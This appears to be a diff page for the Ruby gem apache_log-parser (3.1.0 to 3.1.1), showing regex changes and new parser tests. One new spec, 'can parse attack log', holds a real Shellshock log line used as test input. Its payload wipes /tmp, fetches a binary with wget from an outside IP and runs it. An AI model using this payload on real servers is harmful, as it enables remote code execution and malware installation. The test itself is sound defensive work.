RubyGems - apache_log-parser - Versions diffs - 3.1.0 → 3.1.1 - Mend

apache_log-parser 3.1.0 → 3.1.1

Files changed (5) hide show

checksums.yaml +4 -4
data/lib/apache_log/parser/version.rb +1 -1
data/lib/apache_log/parser.rb +2 -2
data/spec/apache_log/parser_spec.rb +19 -0
metadata +2 -2

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 2679264013d2c6cf84bb77978e6380edd1c4ab67
-  data.tar.gz: 71b9d2114b248aaae424daadcfdd5e86e1cc9528
+  metadata.gz: 059d6f42a9d78d8cfdb3b4245dc5bb7038b52e6b
+  data.tar.gz: 9843f3196f886414b7c7ee784669b0b26b367c6e
 SHA512:
-  metadata.gz: 3281247ab7a73b393dea4364c6595ee9adaa3803767555e3b95ccb575d6159ed5a0b0589e8f5ac6f1b98718ed666ab66be53a67718cf75799bf28f856aa25a06
-  data.tar.gz: e50f2cf1469c4a665581e4d2fbcba1490800033bb65f9e250b705a8dba821708dba266392177b776b738664571f36a2bb719b88213d42cffb75afbd002523b9d
+  metadata.gz: 0e54be8c7eee30b4d7abdc5fea023f9c88cd8917d2ff472ea74d6214bf8919f8c68a3915d8eb561de3e1d09da4300f1dd63fdd90e7a6883024f02308e42223d0
+  data.tar.gz: 577b92735e5c908b20953bfc2729777489b5f58e72517054d39674498926bf630f37559d1c595f126b4b3eba9ce467515de0f3a17c2dfe9ff3399de039873786

data/lib/apache_log/parser/version.rb CHANGED Viewed

@@ -1,5 +1,5 @@
 module ApacheLog
   class Parser
-    VERSION = "3.1.0"
+    VERSION = "3.1.1"
   end
 end

data/lib/apache_log/parser.rb CHANGED Viewed

@@ -7,8 +7,8 @@ module ApacheLog
       common_fields   = %w(remote_host identity_check user datetime request status size)
       combined_fields = common_fields + %w(referer user_agent)
-      common_pattern     = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s+(\S+)\s+(\S+)\s+\[(\d{2}\/.*\d{4}:\d{2}:\d{2}:\d{2}\s.*)\]\s+"(\S+\s\S+\s\S+)"\s+(\S+)\s+(\S+)'
-      combined_pattern   = common_pattern + '\s+"([^"]*)"\s+"([^"]*)"'
+      common_pattern     = '(?:^|\s)((?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|(?:[\w:]+?))\s+(\S+)\s+(\S+)\s+\[(\d{2}\/.*\d{4}:\d{2}:\d{2}:\d{2}\s.*)\]\s+"(.*?)"\s+(\S+)\s+(\S+)'
+      combined_pattern   = common_pattern + '\s+"(.*?[^\\\\])"\s+"(.*?[^\\\\])"'
       additional_pattern = ''
       additional_fields.each do

data/spec/apache_log/parser_spec.rb CHANGED Viewed

@@ -16,6 +16,15 @@ describe ApacheLog::Parser do
     expect(entity).to eq(expect)
   end
+  it 'can parse ipv6 common format log' do
+    line = '::1 - - [20/May/2014:20:04:04 +0900] "GET /test/indx.html HTTP/1.1" 200 4576'
+    parser = ApacheLog::Parser.new('common')
+    entity = parser.parse(line.chomp)
+    expect = {remote_host: '::1', identity_check: '-', user: '-', datetime: DateTime.new(2014, 5, 20, 20, 04, 04, 0.375),
+      request: {method: 'GET', path: '/test/indx.html', protocol: 'HTTP/1.1'}, status: '200', size: '4576'}
+    expect(entity).to eq(expect)
+  end
   it 'can parse tab separated common format log' do
     line = "192.168.0.1\t-\t-\t[07/Feb/2011:10:59:59 +0900]\t\"GET /x/i.cgi/net/0000/ HTTP/1.1\"\t200\t9891";
     parser = ApacheLog::Parser.new('common')
@@ -45,6 +54,16 @@ describe ApacheLog::Parser do
     expect(entity).to eq(expect)
   end
+  it 'can parse attack log' do
+    line = '121.207.230.74 - - [13/Apr/2015:08:21:54 +0900] "GET / HTTP/1.1" 200 2392 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""'
+    parser = ApacheLog::Parser.new('combined')
+    entity = parser.parse(line.chomp)
+    expect = {remote_host: '121.207.230.74', identity_check: '-', user: '-',  datetime: DateTime.new(2015, 4, 13, 8,21,54, 0.375),
+      request: {method: 'GET', path: '/', protocol: 'HTTP/1.1' }, status: '200', size: '2392', referer: '() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"',
+      user_agent: '() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"'}
+    expect(entity).to eq(expect)
+  end
   it 'can parse tab separated combined format log' do
     line = "192.168.0.1\t-\t-\t[07/Feb/2011:10:59:59 +0900]\t\"GET /x/i.cgi/movie/0001/-0002 HTTP/1.1\"\t200\t14462\t\"-\"\t\"DoCoMo/2.0 F08A3(c500;TB;W30H20)\"";
     parser = ApacheLog::Parser.new('combined')

metadata CHANGED Viewed

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: apache_log-parser
 version: !ruby/object:Gem::Version
-  version: 3.1.0
+  version: 3.1.1
 platform: ruby
 authors:
 - Yuichi Takada
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2015-02-21 00:00:00.000000000 Z
+date: 2015-04-18 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: bundler